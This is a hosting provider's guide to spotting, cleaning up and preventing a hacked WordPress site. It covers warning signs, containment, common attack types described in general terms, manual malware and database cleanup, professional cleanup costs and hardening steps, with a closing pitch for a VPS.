WordPress Hacked? Detect, Recover & Prevent

Most owners are shocked to find their WordPress hacked. Your site works fine one day. Next, visitors see warnings, traffic drops, or you notice admin accounts that you don’t recognize. The good news is that recovery is easy if you act quickly and know what to do. 

This guide shows you how to spot the warning signs for a hacked WordPress, contain the infection, get rid of malware completely, and make your hacked WordPress site more secure so it doesn’t happen again. Every step can be taken, whether you do the cleaning yourself or hire someone else to do it. Let’s get started. 

Catching a hacked WordPress website early makes the difference between a quick cleanup and a complete site rebuild. Most attacks don’t announce themselves with a defaced homepage. Instead, they operate quietly in the background, siphoning traffic or using your server to attack other sites. 

You go to your homepage and end up on a completely different site, which usually sells fake goods or worse. Sometimes the redirect only works for people who aren’t logged in, so you won’t see it when you’re logged into your admin panel. From a different device, open your site in an incognito window. If it takes you to strange URLs, especially pharmaceutical spam or adult sites, that’s a clear sign that your WordPress site has been hacked.  

Pop-ups that show up out of nowhere, especially ones you didn’t ask for, are a sign of the same problem. Attackers put JavaScript into your site to show these ads and make money off of your visitors. 

When Google flags your site, search results will say things like “This site may be hacked” or “This site may harm your computer.” Chrome and other browsers might even block visitors completely with a full-page warning. Check Google Search Console. If you see security issue alerts there, it means Google has found malware or something else that looks suspicious.  

When this happens, your search traffic goes away overnight. It takes time to be taken off of blacklists even after cleaning up. The sooner you act, the less damage your SEO will suffer. 

To see all of your users, log into your WordPress dashboard and go to All Users. Check for accounts you didn’t make or know about, especially ones that have Administrator rights. Hackers make backdoor admin accounts on a WordPress site so they can get back in even after you change your passwords. A lot of the time, these fake accounts have generic usernames like “admin2,” “support,” or strings of random characters. Delete any accounts that aren’t yours right away, but remember that this is just one sign of malware; you need to get rid of the real malware too. 

If your pages and posts change, it’s a good sign that your WordPress site has been hacked. Attackers could put hidden links in your content that send visitors to dangerous pages, or they could rewrite whole pages to damage your site or send a message. Unlike sudden redirects, content changes often go unnoticed at first because they look like real posts.  

Look over your most recent posts and pages for any text, links, or formatting that you didn’t add. Look closely at the bottom of old posts, where attackers often put in hidden affiliate links or bad redirects. If you think someone has messed with your hacked WordPress site, check your post revision history (click the post, then scroll down to “Revisions”) to see what changed and when. If you see any changes that you don’t remember making, it’s a sign that someone else has been changing your content. 

When you find out that your site is really hacked, time is of the essence for the WordPress hack recovery. These first steps help keep the damage to a minimum while you get ready for a full WordPress hack cleanup. 

To stop the public from getting in, turn on maintenance mode. This keeps malware from spreading to visitors and stops more damage to your SEO. You can use a plugin like WP Maintenance Mode or ask your hosting company to send traffic to a different site while you fix the hacked WordPress site. 

Change passwords for these accounts immediately: 

1. WordPress admin accounts (all of them) 

2. Hosting control panel (cPanel, Plesk, etc.) 

3. FTP/SFTP accounts 

4. Database user 

5. Email accounts tied to your domain 

Use a password manager like 1Password or Bitwarden to make strong, one-of-a-kind passwords that are at least 16 characters long and have a mix of letters, numbers, and symbols. Attackers can often get in by using weak passwords, and once they have your credentials, they’ll try them everywhere. 

To see all of your users, log into your WordPress dashboard and click on Users. Look for accounts that you didn’t make, especially ones that have Administrator rights. If you see any accounts that look suspicious, hover over them and delete them right away. This stops attackers from keeping their backdoor access while you fix your hacked WordPress site. 

Go to Plugins and turn off all of the plugins. Next, go to Appearance > Themes and choose a default WordPress theme, such as Twenty Twenty-Four. This keeps possible weaknesses separate while you look into which extensions might be at risk. To find out where the infection came from, turn them back on one at a time during the WordPress hack cleanup. 

Take screenshots of any errors, defacements, or strange activity. Write down when you first saw the problem. If you have a security plugin, look at the activity logs for your WordPress admin. This documentation shows you the entry point and helps you figure out how the WordPress hack recovery process should go. It also keeps you from getting infected again.  

Even though your site files are infected, you can still use your FTP client to download a full backup of them. Use the Export function in phpMyAdmin to download your database. Put these hacked copies in a different place. They might help you understand the attack, but you should never restore from them. 

Knowing what kinds of attacks are common can help you stop WordPress hacks from happening again. Most hacks aren’t very complicated; they’re just automated bots looking for known holes in millions of sites. 

WordPress hacker bots try thousands of different username/password pairs against wp-login.php until they get the right one. They go after common usernames like “admin” and use lists of leaked passwords from other breaches. People reuse passwords and stick with defaults, which makes these attacks work. 

A lot of WordPress security holes are in plugins, not in WordPress itself. When developers find a security hole, they release an update. But that same announcement tells WordPress hackers exactly what to look for on sites that haven’t updated yet.  

The worst offenders are plugins that have been left behind. It’s likely that a plugin has a lot of unpatched security holes if it hasn’t been updated in more than two years. People who cracked nulled (pirated) premium plugins often put in backdoors on purpose. 

Poorly coded plugins don’t sanitize database queries properly. Attackers inject malicious SQL commands through form fields, URL parameters, or search boxes. If successful, they can extract your entire database, create new admin users, or modify your site’s content. 

Modern WordPress uses prepared statements to prevent this, but third-party plugins might not follow best practices. This is why code quality matters when choosing extensions 

XSS attacks use comment forms, user profiles, or any field that shows user input without proper filtering to add JavaScript to your site. This bad code then runs in the browsers of people who visit the site, which could steal session cookies or send them to phishing sites.  

Stored XSS is especially dangerous because the bad script is saved in your database and affects everyone who sees that content. Wordfence’s WordPress Annual Security Report says that XSS was the most common type of vulnerability in 2024, making up about half of all WordPress vulnerabilities that were made public. 

Attackers can upload PHP backdoors that look like images when upload forms don’t check file types correctly. A file with the name “photo.jpg.php” might get past basic checks. After the attacker uploads the file to a public directory, they ask for it directly, and it runs on your server, giving them full control. 

Manual cleanup requires technical confidence, but it’s the most thorough approach. Follow these steps in order on how to clean a hacked WordPress site and you’ll be right as rain in no time. 

Before removing anything, identify all infected files. Install a security plugin like Wordfence Security (free version works) if your dashboard is still accessible. Run a full scan and review the results carefully. Wordfence compares your files against clean versions from the WordPress repository and flags anything that doesn’t match. 

A WordPress virus often hides in places initial scans miss. Download Sucuri’s free SiteCheck scanner or VirusTotal to get a second opinion. Look for base64-encoded strings, eval() functions, and suspiciously named files in core directories. When you find a clean WordPress malware scan result, you’re ready to move to removal. 

To remove malware from WordPress, first connect via SFTP (FileZilla or similar). Go to wp-content/uploads/ and search for .php files. In a typical WordPress setup, uploads should not contain executable PHP, so treat any .php files there as suspicious if you want to remove WordPress malware. If you want to be safe, download a copy for review, then delete them.

Next, replace WordPress core files: 

• Delete /wp-admin/ and /wp-includes/ completely 

• Download a clean WordPress copy from WordPress.org 

• Upload fresh wp-admin/ and wp-includes/ folders 

• Overwrite the root core files (for example wp-login.php, wp-load.php, wp-settings.php) 

• Do not overwrite wp-config.php or anything in wp-content/ 

Finally, review wp-config.php and .htaccess for unexpected code. Remove anything suspicious or obfuscated, especially base64_decode, eval, gzinflate, or unusual include statements that do not belong in a config file to clean the hacked WordPress site. 

Once you’ve replaced compromised files, update everything to the latest versions immediately. Most WordPress hacks start with an outdated plugin, theme, or core install. Log into your dashboard and go to Dashboard → Updates. 

If WordPress offers a newer version, update it. To refresh your existing core files without changing versions, click Re-install Now. This updates WordPress core files with clean copies and can remove modified system files without touching your content in wp-content or your database. 

Update WordPress plugins individually. If you’re unsure whether you still need a plugin, remove it. Fewer plugins means fewer attack surfaces. For themes, update WordPress themes and delete any inactive themes. Even disabled themes can be exploited if they contain vulnerabilities. 

WordPress malware doesn’t always live in files. Attackers often inject spam links, malicious scripts, or code directly into the database, which means your site can stay compromised even after you’ve cleaned the filesystem. 

Start by opening your database in phpMyAdmin (or your host’s database tool) and export a full backup before making any changes. Then check the most common persistence points: 

• Users: look for unfamiliar administrator accounts and remove anything you didn’t create. 

• Options: verify that siteurl, home, and the admin email are correct, and watch for injected scripts or strange values. 

• Posts and comments: search for spam links, hidden <script> tags, iframes, and unexpected HTML that doesn’t belong. 

Remove suspicious entries carefully, then re-scan your site to confirm nothing is reappearing. If the database is heavily infected or you’re unsure what’s legitimate, restoring from a known-clean backup (made before the hack) is often the safest path. 

DIY cleanup can work if you’re technically confident, but professional services can save time and reduce the risk of missed backdoors. Many providers also offer security hardening and monitoring options to help prevent reinfection. 

Consider professional WordPress malware removal if: 

• You’ve cleaned the site yourself but the infection keeps returning 

• You don’t have time to handle the technical work safely 

• Your host has suspended your account due to malicious activity 

• Your site is still flagged as unsafe after cleanup 

• You’re concerned about hidden backdoors or persistent access 

Reputable malware removal services typically offer: 

• File and database cleanup, including backdoors that automated scanners may miss. Many services combine automated scanning with manual review by security analysts. 

• Blacklist removal support, including guidance on review requests for Google and other security services. 

• Root cause investigation, to identify the most likely entry point such as a vulnerable plugin, compromised credentials, or misconfiguration. 

• Security hardening recommendations, tailored to your site and hosting environment. 

• Cleanup warranties, often 15–30 days depending on the provider and plan. Some services re-clean the site at no additional cost if it’s reinfected within the warranty period. 

Most of the time, professional WordPress malware removal costs the same as a one-time cleanup or a monthly security plan. Depending on how bad the infection is and whether the service includes database cleanup, hardening, and blacklist support, one-time cleanups can cost anywhere from $59 to $400 or more per site.  

Depending on the plan, monthly security subscriptions can start at $10 to $20 a month and include things like ongoing monitoring, firewall protection, and malware cleanup. A subscription model can be better than a one-time fix for sites that deal with transactions or sensitive data because it focuses on prevention and early detection, not just cleanup.  

Check what’s included before you buy. Some services charge more for blacklist support, quick turnaround, or hardening. Read customer reviews carefully and look for complaints about hidden fees, upsells, or incomplete cleanups that keep coming up- 

Cleaning malware solves the immediate problem. WordPress security hardening reduces the chance of reinfection and makes your site a harder target. 

Change your “admin” username if you still use it. Make a new administrator account with a different username, log in with that account, delete the old one, and give its content to the new one.  

Use a security plugin or a supported module to turn on two-factor authentication (2FA) for all admin accounts. Also, turn on login rate limiting to make brute force attacks take longer. Set reasonable limits that don’t keep real users out.  

If you don’t use XML-RPC (for example, you don’t use the WordPress mobile app or Jetpack features that need it), turn it off in your security plugin or on the web server level. 

Use restrictive file permissions to reduce what an attacker can modify. Typical safe defaults are: 

• Directories: 755 

• Files: 644 

• wp-config.php: as strict as your hosting setup allows (often 600–640) 

Never use 777 permissions. If your host provides a file manager, use it to apply permissions carefully and avoid breaking ownership/permission settings. 

Disable the built-in WordPress file editor by adding this line to wp-config.php: 

define('DISALLOW_FILE_EDIT', true); 

This removes the Theme and Plugin Editor from wp-admin, which helps limit damage if an admin account is compromised. 

WordPress security is ongoing. Create a maintenance routine: 

• Weekly: update plugins/themes, review admin users, run a security scan 

• Monthly: verify backups and test restores, review security logs, check Search Console warnings 

• Quarterly: audit plugins and remove unused ones, review permissions and key settings 

For higher-risk sites or production workloads, a VPS environment like Contabo’s WordPress VPS can provide stronger isolation than shared hosting and more control for server-level hardening such as SSH key authentication, firewall rules, and tools like fail2ban. Combined with WordPress security plugins, this gives you practical defense in depth. 

What to do if my WordPress site was hacked? 

Enable maintenance mode to reduce user exposure, then change all passwords (WordPress admin, hosting control panel, SFTP/SSH, database, and any email accounts tied to resets). Run a malware scan, restore from a known-clean backup if you have one, or follow the cleanup steps in this guide: replace WordPress core files, remove compromised plugins/themes, and clean the database.

How to tell if your WordPress site has been hacked? 

Common signs include browser or Google Safe Browsing warnings, unexpected redirects, new admin users you didn’t create, suspicious .php files in wp-content/uploads/, or injected spam content. Use an external scanner for a quick check, then run a security plugin scan for deeper file and integrity analysis.

Why does my WordPress site keep getting hacked? 

Reinfection usually means the original entry point wasn’t fixed. Common causes include hidden backdoors, outdated plugins/themes, compromised credentials, or a compromised hosting account. Reinstall files from clean sources, remove unfamiliar code in wp-content, rotate all credentials, and enable 2FA on critical accounts.

What is the best WordPress security plugin? 

There isn’t a single best option for every site. Wordfence is a strong all-in-one plugin with a good free tier, but it can be resource-intensive and the free version has delayed threat intelligence updates. Cloud-based options like Sucuri’s WAF can block attacks before they hit WordPress and are often a better fit for high-value or high-traffic sites. Tools like MalCare are popular for automated scanning and cleanup workflows, especially for non-technical site owners. Choose based on your risk level, traffic volume, and whether you want a plugin-based or cloud-based approach.

A hacked WordPress site can seem overwhelming, but if you follow these steps, you can get it back to normal: find the infection, limit the damage, replace the files that were compromised, clean the database, and then make your setup more secure. The sooner you act, the less likely it is that abuse, data exposure, and SEO damage will continue. 

You can safely bring your site back online by following the steps in this guide: maintenance mode, resetting passwords, replacing core files, cleaning up the database, and making security stronger. Cleaning up is not the end of security. Keep WordPress, plugins, and themes up to date. Use strong passwords with two-factor authentication (2FA), run regular scans, and keep backups that have been tested. 

Finally, having the right hosting setup helps. An isolated environment with its own resources and stricter access controls makes common attacks less damaging and gives you more ways to harden your server. A WordPress VPS gives you root access, resource isolation, and the ability to customize your server-level protections in ways that shared hosting can’t. When used with good WordPress hygiene, it makes a practical defense in depth and lowers the chance of getting hacked again.